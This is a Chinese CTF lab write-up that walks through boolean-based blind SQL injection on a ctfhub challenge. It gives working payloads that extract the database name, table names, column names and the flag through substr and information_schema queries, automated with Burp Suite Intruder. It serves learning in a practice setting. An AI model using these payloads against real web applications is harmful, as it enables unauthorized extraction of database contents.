SQL的盲注分为时间盲注和布尔盲注
盲注需要的函数
·length(string字符串)= 或者大于、小于
通过length来来判断字符串的长度
·substr(str字符串,开始位置索引,截取长度)
通过substr来对字符串的内容进行判断
·limit i,n
i:为查询结果的索引值(默认从0开始) n:为查询结果返回的数量
一、布尔盲注
我还是用ctfhub里的入门题
点开题目链接,熟悉的ID提交。先试一下数字型和字符型判断。发现?id=1时界面出现正确的判断语句,?id=1’出现错误的判断语句。所以后面就用?id=1来构造payload
由于界面只出现正确和错误的判断语句,没有回显位。所以先判断数据库的长度。
payload:?id=1 and length(database())=‘2’ --+
结果显示错误,盲猜一手4,发现显示正确。所以数据库的长度为四。
再用substr来爆库名,
payload:?id=1 and substr(database(),1,1)=‘s’ --+
显示正确
所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。所以我看了别的大佬的博客通过burpsuite进行爆破。
爆库名
首先打开burpsuite,点开proxy进行抓包,再送去爆破。再浏览器执行完后,抓包后一些符号会变成ASCII码,省的我们处理了。将payload送去爆破后,先将attack type 改为cluster bomb,再设置两个参数。
?id=1%20and%20substr(database(),&1&,1)=%27&s&%27%20%20--+
对第一个参数选择numbers,由于我们已经知道了数据库名长度为4,所以from 1 to 4。step 选择1。在对第二个参数选择simple list ,在下面选择add from list 添加 a-z ,然后点击start attack 。
在results会显示结果,一般布尔注入都是长度会有不同。对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。再将这些正确的结果通过payload1进行排序就爆出库名sqli
爆表名
通样的,构造注入语句
payload:? id=1%20and%20substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),§1§,1)=%27§a§%27%20%20--+
注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。
第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。
爆字段
payload:?id=1%20and%20substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27flag%27%20limit%200,1),§1§,1)=%27§a§%27%20%20--+
也是results中通过length排序得到flag字段。
爆flag
payload:?id=1%20and%20substr((select%20flag%20from%20sqli.flag),1,1)=%27a%27%20%20--+
由于flag一般会很长,所以第一个参数设置为from 1 到 40 ,第二个参数simple list 不仅要a-z 还要加上0-9和{ 、 },进行爆破。
对results中length排序得到flag,不过这需要人力排序,确实费劲。
好像还有用Python写脚本来进行操作,不需要人力排序。但是我还没学Python,所以可能得等到后面再学习咯。